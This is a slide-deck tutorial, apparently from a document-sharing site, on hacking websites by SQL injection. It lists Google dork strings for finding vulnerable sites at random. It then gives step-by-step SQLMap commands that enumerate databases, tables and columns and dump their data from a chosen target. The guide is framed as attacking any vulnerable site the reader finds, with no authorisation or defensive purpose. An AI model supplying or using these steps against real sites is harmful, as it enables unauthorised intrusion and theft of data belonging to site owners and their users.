How to Hack Website using SQL Injection Attack
Download as PPT, PDF2 likes82 views
The document outlines a tutorial on executing SQL injection attacks using the tool SQLMap on vulnerable websites. It describes steps to retrieve database information, list databases, tables, and columns, and ultimately extract data from a specified column. The tutorial emphasizes the importance of finding SQL injection vulnerabilities in dynamic database-driven websites.
How to Hack Website using SQL Injection Attack
- 2. Page 2 Hack Website using SQL Injection Attack Most of the website on the internet today are dynamic database driven website. But this also led to some vulnerabilities in database. From these vulnerabilities, SQL Injection is most dangerous and common. SQL Injection is a code injection method. In other words, An attacker injects its malicious SQL Code in any field on website to exploit and retrieve confidential information from database. In this tutorial we will hack a website database by sql injection attack using a popular sql injection tool named SQLMap.
- 3. Page 3 Requirements Download SQLMap. (Click Here) Get a SQL Injection Vulnerable Website. Use below google dorks to search for SQLi vulnerable sites. Use these strings on google to find vulnerable site. archive.php?id= article.php?id= phpx?PageID basket.php?id= category.php?catid= category_list.php?id= categorydisplay.php?catid= checkout.php?cartid= checkout.php?UserID=
- 4. Page 4 Step 1 Open terminal and use below command to retrieve Database Information of website. sqlmap -u http://target.com/details.php?id= -u refers to the link of website. I am using a simple imaginary url for the sake of this tutorial. You need to replace this url with your chosen site url. There should be id= or = parameter in url of website which denotes any specific column from database. Note:- Do Note Forget to Replace the target url in above command with your target.
- 5. Page 5 Step 2 After getting database information, execute this command to get list of available databases on website. sqlmap -u http://target.com/details.php?id= --dbs This command will give you list of Databases. --dbs option used to retrieve databases from website.
- 6. Page 6 Step 3 After getting Database, its time to get Tables list. sqlmap -u http://target.com/details.php?id= -D db_name --tables Replace db_name with the database name, of which you wants to retrieve tables.
- 7. Page 7 Step 4 Now that you got tables, You need to get columns in that table. sqlmap -u http://target.com/details.php?id= -D db_name -T table_name --columns Replace table_name with your desired table in database.
- 8. Page 8 Step 5 After getting columns, we are interested in getting the data available in that column. sqlmap -u http://target.com/details.php?id= -D db_name -T table_name -C column_name --dump Replace the column_name with the name of column in table. --dump command is used to retrieve.
- 9. Subscribe and Share CybraryTech.Co mPrivacy is Myth /ethicalhackingtutorialsway
- 10. Subscribe and Share CybraryTech.Co mPrivacy is Myth /ethicalhackingtutorialsway